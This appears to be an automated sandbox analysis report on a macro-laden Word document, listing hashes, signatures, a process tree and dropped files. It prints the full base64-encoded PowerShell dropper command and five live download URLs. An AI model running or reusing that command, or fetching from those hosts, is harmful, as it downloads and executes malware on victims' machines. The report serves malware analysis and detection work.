Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23/05/2024, 21:13

General

  • Target

    6c462833bfb073ffa98832affbe51d79_JaffaCakes118.doc

  • Size

    199KB

  • MD5

    6c462833bfb073ffa98832affbe51d79

  • SHA1

    4e3d34c498534324c6c337958ef7afa8f901d32b

  • SHA256

    545d823a042629cbd1fb6b4874c344010f5d94d584dab152a4f3f54b2d83454b

  • SHA512

    b5c1305715eacd2337945e93ac4e4accef8ca08773cafc40d139213d2ec9cc9c3a65216c6103cfe64e675bb4d9fc18352ac3dd03f9cc6aa3feb888f4407cfb99

  • SSDEEP

    3072:Zx1Eru6nenAJB7BP7/nhZXKiNKDzaJFUKc0UTE7yZRUV7RJeOzi8e:ZHEy6nenAH7B7fXpEDzYUTE7yZRVUi8e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hamrahkar.com/7mYq2Q5

exe.dropper

http://duanhoalac.com/ESNeSYv

exe.dropper

http://envoyagemagazine.com/ZOyd7lN7PO

exe.dropper

http://gandamediasolutions.com/dDYg1QbPhF

exe.dropper

http://www.pabloteixeira.com/Oyr3bbN

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6c462833bfb073ffa98832affbe51d79_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e JABHADYAaQBzADMAWgBJAD0AKAAnAHQAbgA5ACcAKwAnAHUAdABtAGsAJwArACcARwAnACkAOwAkAHAAbQBQAGkANwBhAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAaQB0AGkAYQBiADYAagA9ACgAJwBoACcAKwAnAHQAdABwADoALwAvAGgAJwArACcAYQBtAHIAYQBoAGsAJwArACcAYQAnACsAJwByAC4AYwBvAG0ALwA3AG0AJwArACcAWQBxADIAUQA1AEAAaAB0AHQAcAA6AC8ALwBkAHUAYQAnACsAJwBuAGgAbwAnACsAJwBhACcAKwAnAGwAYQBjAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcALwBFAFMATgAnACsAJwBlAFMAJwArACcAWQB2AEAAaAB0AHQAcAA6AC8ALwBlAG4AdgBvAHkAJwArACcAYQAnACsAJwBnAGUAbQAnACsAJwBhAGcAJwArACcAYQB6AGkAbgBlAC4AYwBvAG0ALwBaAE8AeQBkADcAbABOADcAUABPAEAAJwArACcAaAAnACsAJwB0AHQAcAAnACsAJwA6ACcAKwAnAC8ALwBnAGEAbgBkAGEAJwArACcAbQAnACsAJwBlAGQAaQBhAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALwBkAEQAJwArACcAWQAnACsAJwBnADEAJwArACcAUQBiAFAAaABGAEAAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwB3ACcAKwAnAHcAJwArACcAdwAuAHAAYQBiAGwAbwB0AGUAaQB4ACcAKwAnAGUAaQByAGEALgBjAG8AbQAvAE8AeQByADMAYgAnACsAJwBiACcAKwAnAE4AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAWQBwAG4AQQA4ADIAPQAoACcAWQBqAE0AJwArACcANQBrACcAKwAnAEEAUQAnACkAOwAkAHUARQBxAGgAQwAzADkAIAA9ACAAKAAnADMAOQAnACsAJwA3ACcAKQA7ACQAZgA0AFIANABIAEoAbAAxAD0AKAAnAFIAJwArACcARQA3ACcAKwAnADYAdQB6ACcAKQA7ACQAUQB2AHEAQgA0AEYAZAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcACcAKwAkAHUARQBxAGgAQwAzADkAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABNAHoAagB6ADIAagAgAGkAbgAgACQAYQBpAHQAaQBhAGIANgBqACkAewB0AHIAeQB7ACQAcABtAFAAaQA3AGEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQATQB6AGoAegAyAGoALAAgACQAUQB2AHEAQgA0AEYAZAApADsAJABaADUAbAAxADEANQBvAE0APQAoACcAQwAnACsAJwA5AGkAJwArACcAVQBtAHcAaQBPACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAFEAdgBxAEIANABGAGQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABRAHYAcQBCADQARgBkADsAJABjAGkAWgBIAFEANABKAD0AKAAnAE4ASwB3AHAAJwArACcAVQA1AEYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAWABPADYAYQBvAHoAbQA9ACgAJwBXACcAKwAnAEsAYQAnACsAJwBmADUAdgAnACkAOwA=
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1192
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:764

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

            Filesize

            68KB

            MD5

            29f65ba8e88c063813cc50a4ea544e93

            SHA1

            05a7040d5c127e68c25d81cc51271ffb8bef3568

            SHA256

            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

            SHA512

            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            344B

            MD5

            707711502dc49e2039dfec478a0090aa

            SHA1

            9abad64fc8a133e7f6cbc39911e86942b35a59d6

            SHA256

            eda25c796a30ab126cb2146d70604957260297b740335c57c709a1c471c7bdc7

            SHA512

            bf3bf1e89c138081f81e443903f206d9999677f4bcce912579829c31ee90e0fdefdcdf3da0cafde6cc25103edfef27076ca87f10758398f8aaa8fbd72e9db477

          • C:\Users\Admin\AppData\Local\Temp\CabC0A3.tmp

            Filesize

            65KB

            MD5

            ac05d27423a85adc1622c714f2cb6184

            SHA1

            b0fe2b1abddb97837ea0195be70ab2ff14d43198

            SHA256

            c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

            SHA512

            6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

          • C:\Users\Admin\AppData\Local\Temp\TarC25E.tmp

            Filesize

            177KB

            MD5

            435a9ac180383f9fa094131b173a2f7b

            SHA1

            76944ea657a9db94f9a4bef38f88c46ed4166983

            SHA256

            67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

            SHA512

            1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            7c20baf3e14bb42f381031c9e7629436

            SHA1

            4217382b6fd43539d8edd2c6bc0e8622d7f416b5

            SHA256

            14cc5a865a1346c25122467e061e26a635346903840904a8e326f3d0ab862188

            SHA512

            33e9e0f5d41986f67f6f3200e45712d627c09afc9cb14409df5759f73cb357084e6cf067a74656fe01fb0ad679f5e6c950e9a4ab399172ea71759f305471f630

          • memory/2804-126-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-0-0x000000002F781000-0x000000002F782000-memory.dmp

            Filesize

            4KB

          • memory/2804-105-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-74-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-63-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-52-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-41-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-135-0x0000000070E5D000-0x0000000070E68000-memory.dmp

            Filesize

            44KB

          • memory/2804-136-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-127-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-20-0x0000000006360000-0x0000000006460000-memory.dmp

            Filesize

            1024KB

          • memory/2804-19-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-2-0x0000000070E5D000-0x0000000070E68000-memory.dmp

            Filesize

            44KB

          • memory/2804-195-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-208-0x0000000005000000-0x0000000005100000-memory.dmp

            Filesize

            1024KB

          • memory/2804-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2804-230-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2804-231-0x0000000070E5D000-0x0000000070E68000-memory.dmp

            Filesize

            44KB